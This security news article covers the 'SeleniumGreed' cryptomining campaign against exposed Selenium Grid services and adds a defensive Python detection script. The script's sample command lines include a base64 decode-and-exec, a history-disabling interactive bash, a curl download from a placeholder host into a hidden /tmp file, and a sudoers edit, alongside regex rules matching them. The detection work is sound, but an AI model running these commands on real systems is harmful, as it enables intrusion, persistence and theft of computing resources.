Unsecured Selenium Grid Services Become Hotspots for Cryptomining
A cryptomining campaign, known as “SeleniumGreed,” targets vulnerable Selenium Grid services, as reported by Wiz Research. Selenium Grid, a component of the widely used open-source Selenium suite for web application testing, enables extensive interaction with connected machines, including command execution and file manipulation. Primarily designed for internal network use, the service ships without built-in security controls. As Wiz explains, "Selenium Grid is designed for use in internal networks and lacks security controls by default. Ideally, such services should never be exposed to the internet." The researchers underline the concern, pointing out that "the lack of a default authentication mechanism on this service means many exposed instances are misconfigured and can be accessed and exploited by malicious actors." This security oversight has been actively exploited by a threat actor for over a year.
Over the course of the observed attack, the adversary uses the Selenium WebDriver API to execute Python scripts containing a reverse shell command. The payload is delivered base64-encoded, and the attacker issues commands that decode and execute it. The decoded payload initiates a reverse shell through a Python command that connects to a remote host, disables shell history logging by setting the HISTFILE environment variable to '/dev/null', and spawns a bash session with '/bin/bash'. Additionally, the attacker creates a hidden script within directories such as "/tmp" or "/dev/shm", uses the curl command to download cryptomining software, and sets file permissions with chmod 700 to restrict access to the files. They may also modify the '/etc/sudoers' file to allow the 'seluser' account to execute commands without password prompts. To ensure that scripts and binaries keep running after the session terminates, the adversary launches them with nohup.
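The behaviours described above leave recognisable traces in process command-line telemetry. As an added illustration (not part of the Wiz report or this article), the following Python applies simple detection rules to a constructed set of command lines; the rule names and sample strings are this example's own, not captured SeleniumGreed artefacts.

```python
import re

# Constructed sample of process command lines, as an EDR or auditd pipeline
# might record them on a Selenium Grid node. Illustrative only.
SAMPLE_CMDLINES = [
    "python3 -c \"import base64;exec(base64.b64decode('SGVsbG8='))\"",
    "bash -c 'export HISTFILE=/dev/null; /bin/bash -i'",
    "curl -fsSL http://example.invalid/miner -o /tmp/.x",
    "chmod 700 /dev/shm/.y",
    "sh -c 'echo \"seluser ...\" >> /etc/sudoers'",   # sudoers edit, contents elided
    "nohup /tmp/.x",
    "python3 -m pytest tests/",                        # benign control
    "chmod 700 /home/seluser/run.sh",                  # benign control
]

# One rule per stage of the chain described in the article. Rule names are
# this example's own labels.
RULES = {
    "base64_decode_exec": re.compile(r"base64\s+(-d|--decode)|b64decode"),
    "history_disabled": re.compile(r"HISTFILE=/dev/null"),
    "curl_to_tmp": re.compile(r"\bcurl\b.*\s-o\s+/(tmp|dev/shm)/"),
    "hidden_file_in_tmp": re.compile(r"/(tmp|dev/shm)/\.[^\s/]+"),
    "restrictive_chmod_tmp": re.compile(r"chmod\s+700\s+/(tmp|dev/shm)/"),
    "sudoers_seluser": re.compile(r"/etc/sudoers.*seluser|seluser.*/etc/sudoers"),
    "nohup_tmp_binary": re.compile(r"\bnohup\s+/(tmp|dev/shm)/"),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(cmdlines) -> list[tuple[str, list[str]]]:
    """Return (cmdline, matched_rules) for each line that triggers a rule."""
    return [(line, classify(line)) for line in cmdlines if classify(line)]


def chain_score(cmdlines) -> dict:
    """Escalate when several distinct stages appear together on one host:
    a single hit may be noise, three or more stages is the described chain."""
    stages = set()
    for line in cmdlines:
        stages.update(classify(line))
    return {"stages": sorted(stages), "suspicious": len(stages) >= 3}


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_CMDLINES):
        print(f"{rules}: {line}")
    print(chain_score(SAMPLE_CMDLINES))
```

On a real host the same rules would run over the Grid node's process telemetry rather than a static list, and the benign controls show why single-rule hits should not be alerted on in isolation.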
Service misconfigurations remain a leading cause of breaches. Wiz’s report on the exploitation of Selenium Grid is a reminder of the need to secure devices, particularly those that are internet-facing. Such an attack lets adversaries use the computing resources of compromised machines for cryptocurrency mining, which can lead to performance degradation and system instability. Wiz’s analysis underscores the need for organizations to properly secure their Selenium Grid instances and ensure they are not exposed to the public internet without adequate security measures. Further recommendations include stringent network security controls on both inbound and outbound access, and the use of external network scanners together with vulnerability scanners to map exposure within cloud environments.